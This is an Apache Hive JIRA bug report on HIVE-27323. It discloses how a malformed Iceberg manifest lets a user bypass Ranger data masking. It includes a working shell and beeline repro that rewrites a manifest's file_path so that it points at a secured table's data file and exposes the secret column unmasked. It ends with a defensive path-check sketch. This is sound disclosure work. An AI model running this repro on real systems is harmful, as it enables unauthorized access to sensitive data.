Janos Kovacs created HIVE-27323:
-----------------------------------
Summary: Iceberg: malformed manifest file or list can cause data
breach
Key: HIVE-27323
URL: https://issues.apache.org/jira/browse/HIVE-27323
Project: Hive
Issue Type: Bug
Components: Iceberg integration
Affects Versions: 4.0.0-alpha-2
Reporter: Janos Kovacs
Set to bug/blocker instead of enhancement because of its security-related
nature: Hive 4 should not be released without a fix for this. Please reset if
needed.
FYI: this is similar to HIVE-27322, but it relies more on Iceberg's internals
and can't be fixed via the storage handler authorizer alone.
Context:
* There are some core tables with sensitive data that users can only query
with data masking enforced (e.g. via Ranger). Let's assume this is the
`default.icebergsecured` table.
* An end-user can only access the masked form of the sensitive data as
expected...
* The users also have the privilege to create new tables in their own sandbox
databases - let's assume this is the `default.trojanhorseviadata` table for now.
* The user can create a malicious table that exposes the sensitive data
unmasked, leading to a possible data breach.
* Hive runs with doAs=false so that it can enforce FGAC and so that end users
do not need direct file-system access.
Repro:
* First make sure the data is secured by the masking policy:
{noformat}
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!');
"
<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
| icebergsecured.txt                 | icebergsecured.secret          |
+------------------------------------+--------------------------------+
| You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
+------------------------------------+--------------------------------+
{noformat}
* Now let the user create the malicious table exposing the sensitive data:
{noformat}
<kinit as end user>
beeline -e "
DROP TABLE IF EXISTS default.trojanhorseviadata;
CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string)
STORED BY ICEBERG
LOCATION '/some-user-writeable-location/trojanhorseviadata';
INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder');
"
SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
  beeline --outputformat=csv2 --showHeader=false --verbose=false \
  --showWarnings=false --silent=true --report=false \
  -e "SELECT file_path FROM default.icebergsecured.files;" 2>/dev/null)
TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
  beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null \
  | grep metadata_location | grep -v previous_metadata_location | awk '{print $5}')
TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION \
  | grep "manifest-list" | cut -f4 -d\")
hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION
TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION)
TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST \
  | jq '.manifest_path' | tr -d \")
hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION
TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION)
mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig
avro-tools tojson ${TROJAN_MANIFESTFILE}.orig \
  | jq --arg fp "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json
avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > ${TROJAN_MANIFESTFILE}.schema
avro-tools fromjson --codec deflate --schema-file ${TROJAN_MANIFESTFILE}.schema \
  ${TROJAN_MANIFESTFILE}.json > ${TROJAN_MANIFESTFILE}.new
hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION
beeline -e "SELECT * FROM default.trojanhorseviadata;"
+------------------------------------+-----------------------------------+
| trojanhorseviadata.txt             | trojanhorseviadata.secret         |
+------------------------------------+-----------------------------------+
| You might be allowed to see this.  | You are NOT allowed to see this!  |
+------------------------------------+-----------------------------------+
{noformat}
There are multiple ways to create such a table and modify the manifest file or
manifest list, for example by reusing parts of the Iceberg code or simply by
using Spark, which requires direct end-user write access to the file system.
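
For illustration, the malformed condition in the repro is a manifest entry whose `data_file.file_path` lies outside the table's own location. Below is a minimal shell sketch of a check for that condition. `outside_table_location` and `TABLE_LOCATION` are hypothetical names, not part of Hive or Iceberg, and this is not a proposed fix. The sketch assumes the paths and the location are written in the same form (same scheme and authority) and compares them as plain strings.

```shell
#!/usr/bin/env bash
# Hypothetical helper (not part of Hive or Iceberg): reads data-file paths
# from stdin, one per line, and prints those that are not under the given
# table location. Paths are compared as plain strings, so the location must
# use the same scheme/authority form as the paths in the manifest.
outside_table_location() {
  local location="${1%/}"   # drop one trailing slash, if any
  local path
  while IFS= read -r path; do
    [ -z "$path" ] && continue
    case "$path" in
      */../*|*/..) printf '%s\n' "$path" ;;  # '..' components could escape the prefix
      "$location"/*) ;;                      # inside the table directory
      *) printf '%s\n' "$path" ;;            # points somewhere else
    esac
  done
}

# Possible usage with the tools from the repro (TABLE_LOCATION is assumed
# to hold the table's location):
#   avro-tools tojson ${TROJAN_MANIFESTFILE}.new \
#     | jq -r '.data_file.file_path' \
#     | outside_table_location "$TABLE_LOCATION"
```

Note that a data file outside the table location is not necessarily invalid in Iceberg, so a hit from such a check is only a hint that the manifest deserves a closer look.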